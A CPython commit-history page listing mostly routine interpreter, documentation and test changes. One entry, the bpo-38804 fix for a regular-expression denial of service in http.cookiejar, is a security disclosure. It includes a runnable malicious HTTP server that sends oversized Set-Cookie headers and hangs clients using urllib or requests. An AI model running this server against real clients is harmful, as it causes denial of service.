Commit Graph

106086 Commits

Author SHA1 Message Date
Victor Stinner d68b592dd6
bpo-38896: Remove PyUnicode_ClearFreeList() function (GH-17354)
Remove PyUnicode_ClearFreeList() function: the Unicode free list has
been removed in Python 3.3.
2019-11-23 02:30:32 +01:00
PypeBros 14a89c4798 bpo-38686: fix HTTP Digest handling in request.py (#17045)
* fix HTTP Digest handling in request.py

There is a bug triggered when server replies to a request with `WWW-Authenticate: Digest` where `qop="auth,auth-int"` rather than mere `qop="auth"`. Having both `auth` and `auth-int` is legitimate according to the `qop-options` rule in §3.2.1 of [[https://www.ietf.org/rfc/rfc2617.txt|RFC 2617]]:
>      qop-options       = "qop" "=" <"> 1#qop-value <">
>      qop-value         = "auth" | "auth-int" | token
> **qop-options**: [...] If present, it is a quoted string **of one or more** tokens indicating the "quality of protection" values supported by the server.  The value `"auth"` indicates authentication; the value `"auth-int"` indicates authentication with integrity protection

This is description confirmed by the definition of the [//n//]`#`[//m//]//rule// extended-BNF pattern defined in §2.1 of [[https://www.ietf.org/rfc/rfc2616.txt|RFC 2616]] as 'a comma-separated list of //rule// with at least //n// and at most //m// items'.

When this reply is parsed by `get_authorization`, request.py only tests for identity with `'auth'`, failing to recognize it as one of the supported modes the server announced, and claims that `"qop 'auth,auth-int' is not supported"`.

* 📜🤖 Added by blurb_it.

* bpo-38686 review fix: remember why.

* fix trailing space in Lib/urllib/request.py

Co-Authored-By: Brandt Bucher <brandtbucher@gmail.com>
2019-11-22 15:19:08 -08:00
Ethan Furman 3ae38cc181
Update CODEOWNERS (#17356)
Add Ethan Furman for enum, cgi, and cgitb.
2019-11-22 14:28:41 -08:00
Victor Stinner 2ec1a1b307
bpo-38858: new_interpreter() uses pycore_init_import_warnings() (GH-17353) 2019-11-22 21:54:33 +01:00
Victor Stinner 2582d46fbc
bpo-38858: new_interpreter() reuses pycore_init_builtins() (GH-17351)
new_interpreter() now calls _PyBuiltin_Init() to create the builtins
module and calls _PyImport_FixupBuiltin(), rather than using
_PyImport_FindBuiltin(tstate, "builtins").

pycore_init_builtins() is now responsible to initialize
intepr->builtins_copy: inline _PyImport_Init() and remove this
function.
2019-11-22 19:24:49 +01:00
Victor Stinner 82c83bd907
bpo-38858: _PyImport_FixupExtensionObject() handles subinterpreters (GH-17350)
If _PyImport_FixupExtensionObject() is called from a subinterpreter,
leave extensions unchanged and don't copy the module dictionary
into def->m_base.m_copy.
2019-11-22 18:52:27 +01:00
Callum Ward 42bc60ead3 closes bpo-29275: Remove Y2K reference from time module docs (GH-17321)
The Y2K reference is not needed as it only points out that Python's use
of C standard functions doesn't generally suffer from Y2K issues; the
point regarding conventions for conversion of 2-digit years in
:func:`strptime` is still valid.
2019-11-22 08:57:14 -08:00
Victor Stinner b00513636c
bpo-38858: Add init_interp_main() subfunction (GH-17347)
Fix new_interpreter() error handling: undo it all if status is an
exception.
2019-11-22 17:52:42 +01:00
Victor Stinner e0c9ab8e26
bpo-38858: Add init_set_builtins_open() subfunction (GH-17346) 2019-11-22 16:19:14 +01:00
bcaller 1b779bfb85 bpo-38804: Fix REDoS in http.cookiejar (GH-17157)
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
2019-11-22 15:22:11 +01:00
Alex 4e205b74f9 Fix quoted signature of setattrofunc (GH-17251)
setattrofunc returns `int`, not `PyObject *`.
2019-11-22 14:48:14 +01:00
jacksonriley 138e7bbb0a bpo-38866: Remove asyncore from test_pyclbr.py (GH-17316)
Co-Authored-By: Kyle Stanley <aeros167@gmail.com>
2019-11-22 21:51:58 +09:00
Victor Stinner 3d4833488a
bpo-38858: Call _PyUnicode_Fini() in Py_EndInterpreter() (GH-17330)
Py_EndInterpreter() now clears the filesystem codec.
2019-11-22 12:27:50 +01:00
Victor Stinner 310e2d2517
bpo-36854: Fix refleak in subinterpreter (GH-17331)
finalize_interp_clear() now explicitly clears the codec registry and
then trigger a GC collection to clear all references.
2019-11-22 10:58:00 +01:00
Siwon Kang 91daa9d722 bpo-38863: Improve is_cgi() in http.server (GH-17312)
is_cgi() function of http.server library does not currently handle a
cgi script if one of the cgi_directories is located at the
sub-directory of given path. Since is_cgi() in CGIHTTPRequestHandler
class separates given path into (dir, rest) based on the first seen
'/', multi-level directories like /sub/dir/cgi-bin/hello.py is divided
into head=/sub, rest=dir/cgi-bin/hello.py then check whether '/sub'
exists in cgi_directories = [..., '/sub/dir/cgi-bin'].
This patch makes the is_cgi() keep expanding dir part to the next '/'
then checking if that expanded path exists in the cgi_directories.

Signed-off-by: Siwon Kang <kkangshawn@gmail.com>





https://bugs.python.org/issue38863
2019-11-22 01:13:05 -08:00
Raymond Hettinger b4e5eeac26
Defer import of shutil which only needed for help and usage (GH-17334) 2019-11-21 22:51:45 -08:00
Claudiu Popa 65444cf7fe bpo-38526: Fix zipfile.Path method name to be the correct one (#17317) 2019-11-21 16:23:13 -05:00
benedwards14 0aca3a3a1e bpo-37838: get_type_hints for wrapped functions with forward reference (GH-17126)
https://bugs.python.org/issue37838
2019-11-21 17:24:58 +00:00
Mark Shannon 82f897bf8f
Correct release version to 3.9 for RERAISE and WITH_EXCEPT_START bytecodes. (#17318)
bpo-33387

Corrects commit fee5526
2019-11-21 14:47:49 +00:00
Victor Stinner 3ab479a2d1
bpo-38692: Skip test_posix.test_pidfd_open() on EPERM (GH-17290)
Skip the test_posix.test_pidfd_open() test if os.pidfd_open() fails
with a PermissionError. This situation can happen in a Linux sandbox
using a syscall whitelist which doesn't allow the pidfd_open()
syscall yet (like systemd-nspawn).
2019-11-21 12:54:54 +01:00
Victor Stinner 0127bb1c5c
bpo-38875: test_capi: trashcan tests require cpu resource (GH-17314)
test_capi: trashcan tests now require the test "cpu" resource.
2019-11-21 12:54:02 +01:00
Giampaolo Rodola 5c534da798
CODEOWNERS: add myself for asyncore/chat, ftplib and shutil modules (#17313) 2019-11-21 17:38:51 +08:00
Mark Shannon fee552669f
Produce cleaner bytecode for 'with' and 'async with' by generating separate code for normal and exceptional paths. (#6641)
Remove BEGIN_FINALLY, END_FINALLY, CALL_FINALLY and POP_FINALLY bytecodes. Implement finally blocks by code duplication.
Reimplement frame.lineno setter using line numbers rather than bytecode offsets.
2019-11-21 09:11:43 +00:00
Victor Stinner 5dcc06f6e0
bpo-38858: Allocate small integers on the heap (GH-17301)
Allocate small Python integers (small_ints of longobject.c) on the
heap, rather than using static objects.
2019-11-21 08:51:59 +01:00
Géry Ogam d67279147a Update functions.rst (GH-16468)
This PR will make the following changes to the [_Built-in Functions_](https://docs.python.org/3/library/functions.html) chapter of the library documentation:

- improve hyperlinks in Sphinx roles (trailing 's' belong to hyperlinks).

Automerge-Triggered-By: @csabella
2019-11-20 18:10:19 -08:00
Dave Nguyen 9391f6c3ef bpo-36277: Add document for pdb debug and retval commands (GH-12872)
https://bugs.python.org/issue36277



Automerge-Triggered-By: @csabella
2019-11-20 17:49:15 -08:00
Jules Lasne (jlasne) 6db2fb7c30 Removed capital letter in parameter in stdtypes.rst (GH-17218)
Automerge-Triggered-By: @csabella
2019-11-20 17:30:05 -08:00
Aveheuzed 06ca2a2be9 Fixed an incorrect sentence in the docs (GH-17205)
Fixed an incorrect sentence in Doc/c-api/mapping.rst I fell on
while translating the file.

skip issue

Automerge-Triggered-By: @csabella
2019-11-20 17:19:00 -08:00
Jason Fried 046442d02b bpo-38857: AsyncMock fix for awaitable values and StopIteration fix [3.8] (GH-17269) 2019-11-20 16:27:51 -08:00
Brandt Bucher e5d1f734db bpo-38823: Clean up _xxtestfuzz initialization. (GH-17216)
https://bugs.python.org/issue38823
2019-11-20 16:17:02 -08:00
xdegaye 559bad1a70 bpo-38841: Skip asyncio test_create_datagram_endpoint_existing_sock_unix (GH-17294)
on platforms lacking a functional bind() for named unix domain sockets



https://bugs.python.org/issue38841



Automerge-Triggered-By: @asvetlov
2019-11-20 12:02:07 -08:00
Victor Stinner b93f31fcd9
bpo-38858: Fix Py_Finalize() when called from a subinterpreter (GH-17297)
Use _Py_IsMainInterpreter() in Py_Initialize() and Py_Finalize() to
detect if the current interpreter is the main interpreter or not.
2019-11-20 18:39:12 +01:00
Steve Dower de148f263f
bpo-33125: Add support for building and releasing Windows ARM64 packages (GH-16828)
Note that the support is not actually enabled yet, and so we won't be publishing these packages. However, for those who want to build it themselves (even by reusing the Azure Pipelines definition), it's now relatively easy to enable.
2019-11-20 09:30:47 -08:00
Segev Finer abce2d9bc6 Add Python 3.8 to py based search in find_python.bat (GH-17188) 2019-11-20 09:25:45 -08:00
Victor Stinner fff7bbfdb6
bpo-38858: Add _Py_IsMainInterpreter(tstate) (GH-17293) 2019-11-20 17:34:39 +01:00
Steve Dower db7925a1ca
Update information about publishing a new version to the Microsoft Store (GH-17262) 2019-11-20 08:21:14 -08:00
Federico Bond be5c79e033 bpo-38821: Fix crash in argparse when using gettext (GH-17192) 2019-11-20 15:29:29 +02:00
Victor Stinner 4dedd0f0dd
bpo-37340: Remove PyMethod_ClearFreeList() and PyCFunction_ClearFreeList() (GH-17284)
Remove PyMethod_ClearFreeList() and PyCFunction_ClearFreeList()
functions: the free lists of bound method objects have been removed.

Remove also _PyMethod_Fini() and _PyCFunction_Fini() functions.
2019-11-20 12:59:12 +01:00
Victor Stinner 7247407c35
bpo-36854: Move _PyRuntimeState.gc to PyInterpreterState (GH-17287)
* Rename _PyGC_InitializeRuntime() to _PyGC_InitState()
* finalize_interp_clear() now also calls _PyGC_Fini() in
  subinterpreters (clear the GC state).
2019-11-20 12:25:50 +01:00
Victor Stinner 488d02a241
bpo-38835: Exclude PyFPE macros from the stable API (GH-17228)
Exclude PyFPE_START_PROTECT() and PyFPE_END_PROTECT() macros of
pyfpe.h from Py_LIMITED_API (stable API).
2019-11-20 12:17:09 +01:00
Victor Stinner e7e699e4df
bpo-38858: Fix reference leak in pycore_init_types() (GH-17286)
Only call _PyGC_Init(), _PyExc_Init() and _PyErr_Init() in
new_interpreter().
2019-11-20 12:08:13 +01:00
Victor Stinner 67e0de6f0b
bpo-36854: gcmodule.c gets its state from tstate (GH-17285)
* Add GCState type for readability
* gcmodule.c now gets its gcstate from tstate
* _PyGC_DumpShutdownStats() now expects tstate rather than runtime
* Rename "state" to "gcstate" for readability: to avoid confusion
  between "state" and "tstate" for example.
* collect() now only expects tstate: it gets gcstate from tstate.
* Pass tstate to _PyErr_xxx() functions
2019-11-20 11:48:18 +01:00
Victor Stinner 9da7430675
bpo-36854: Clear the current thread later (GH-17279)
Clear the current thread later in the Python finalization.

* The PyInterpreterState_Delete() function is now responsible
  to call PyThreadState_Swap(NULL).
* The tstate_delete_common() function is now responsible to clear the
  "autoTSSKey" thread local storage and it only clears it once the
  thread state is fully cleared. It allows to still get the current
  thread from TSS in tstate_delete_common().
2019-11-20 11:17:17 +01:00
Brandt Bucher d51a363a43 bpo-38823: Fix refleak in _tracemalloc init error handling (GH-17235) 2019-11-20 11:00:31 +01:00
Victor Stinner 7eee5beaf8
bpo-38858: Factorize Py_EndInterpreter() code (GH-17273)
* Factorize code in common between Py_FinalizeEx() and
  Py_EndInterpreter().
* Py_EndInterpreter() now also calls _PyWarnings_Fini().
* Call _PyExc_Fini() and _PyGC_Fini() later in the finalization.
2019-11-20 10:38:34 +01:00
Terry Jan Reedy b8462477bf
bpo-38636: Fix IDLE tab toggle and file indent width (GH-17008)
These Format menu functions (default shortcuts Alt-T and Alt-U)
were mistakenly disabled in 3.7.5 and 3.8.0.
2019-11-20 01:18:39 -05:00
Benjamin Peterson 7483451577
closes bpo-38712: Add signal.pidfd_send_signal. (GH-17070)
This exposes a Linux-specific syscall for sending a signal to a process
identified by a file descriptor rather than a pid.

For simplicity, we don't support the siginfo_t parameter to the syscall. This
parameter allows implementing a pidfd version of rt_sigqueueinfo(2), which
Python also doesn't support.
2019-11-19 20:39:14 -08:00
Victor Stinner be143ec996
bpo-38835: Don't use PyFPE_START_PROTECT and PyFPE_END_PROTECT (GH-17231)
The PyFPE_START_PROTECT() and PyFPE_END_PROTECT() macros are empty:
they have been doing nothing for the last year  (since commit
735ae8d139), so stop using them.
2019-11-20 02:51:30 +01:00
Victor Stinner 01b1cc12e7
bpo-36710: Add PyInterpreterState.runtime field (GH-17270)
Add PyInterpreterState.runtime field: reference to the _PyRuntime
global variable. This field exists to not have to pass runtime in
addition to tstate to a function.  Get runtime from tstate:
tstate->interp->runtime.

Remove "_PyRuntimeState *runtime" parameter from functions already
taking a "PyThreadState *tstate" parameter.

_PyGC_Init() first parameter becomes "PyThreadState *tstate".
2019-11-20 02:27:56 +01:00
Łukasz Langa eb1cbbff1c
Post 3.9.0a1 2019-11-20 02:06:33 +01:00